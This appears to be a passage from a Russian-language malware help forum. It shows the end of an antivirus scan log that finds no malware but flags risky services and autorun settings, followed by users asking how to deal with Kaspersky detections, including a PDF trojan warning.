      Прямое чтение C:\Users\Вася\AppData\Local\Temp\1807cacf-db3c-462b-8317-19e7b48a6549.tmp
      Прямое чтение C:\Users\Вася\AppData\Local\Temp\429db0e8-0600-45ab-a18b-8c82e45cdd1a.tmp
      Прямое чтение C:\Users\Вася\AppData\Local\Temp\6b5dd892-d3b3-4a50-ac70-4bcaee0c85a0.tmp
      Прямое чтение C:\Users\Вася\AppData\Local\Temp\841b9781-9b96-4205-872a-a33139bb86fc.tmp
      Прямое чтение C:\Users\Вася\AppData\Local\Temp\95822c3b-9fa1-4fcd-ad01-ae8455af46a2.tmp
      Прямое чтение C:\Users\Вася\AppData\Local\Temp\c5858088-f9a7-40f8-a4e7-93894ce42607.tmp
      Прямое чтение C:\Users\Вася\AppData\Local\Temp\f70ce670-2204-4b50-9897-1cdba3afa2ce.tmp
      4. Проверка Winsock Layered Service Provider (SPI/LSP)
       Настройки LSP проверены. Ошибок не обнаружено
      5. Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)
      6. Поиск открытых портов TCP/UDP, используемых вредоносными программами
       Проверка отключена пользователем
      7. Эвристичеcкая проверка системы
      Проверка завершена
      8. Поиск потенциальных уязвимостей
      >> Службы: разрешена потенциально опасная служба TermService (Службы удаленных рабочих столов)
      >> Службы: разрешена потенциально опасная служба SSDPSRV (Обнаружение SSDP)
      >> Службы: разрешена потенциально опасная служба Schedule (Планировщик задач)
      > Службы: обратите внимание - набор применяемых на ПК служб зависит от области применения ПК (домашний, ПК в ЛВС компании ...)!
      >> Безопасность: разрешен автозапуск программ с CDROM
      >> Безопасность: разрешен административный доступ к локальным дискам (C$, D$ ...)
      >> Безопасность: к ПК разрешен доступ анонимного пользователя
      >> Безопасность: Разрешена отправка приглашений удаленному помощнику
      Проверка завершена
      9. Мастер поиска и устранения проблем
       >>  Таймаут завершения служб находится за пределами допустимых значений
       >>  Разрешен автозапуск с HDD
       >>  Разрешен автозапуск с сетевых дисков
       >>  Разрешен автозапуск со сменных носителей
      Проверка завершена
      Просканировано файлов: 116562, извлечено из архивов: 26001, найдено вредоносных программ 0, подозрений - 0
      Сканирование завершено в 09.10.2024 08:36:47
      Сканирование длилось 00:12:19
       
      на вирусы в ccleaner и через windows проверил - ничего не показало
       
      ничего подозрительного не скачивал. Все файлы проверял через VirusTotal
    • Hard07
      От Hard07
      Не удаляется касперским, удалил уже все приложения которые могли его принести, в том числе торрент, что делать?
    • tau34
      От tau34
      Здравствуйте зашел на один сайт посмотреть pdf документ и Касперский выдад уведомление , мне сейчас надо как то удалять его или что? пишет вот такой троян:  HEUR:Trojan.PDF.Badur.gena
      я просто в браузере pdf открыл этот там видать ссылка на вредоносный сайт или что раз так Касперский срнагировал
       
      Сообщение от модератора kmscom Тема перемещена из раздела Помощь по персональным продуктам  
       
       
       
       
       
       
       
       

×
×
  • Создать...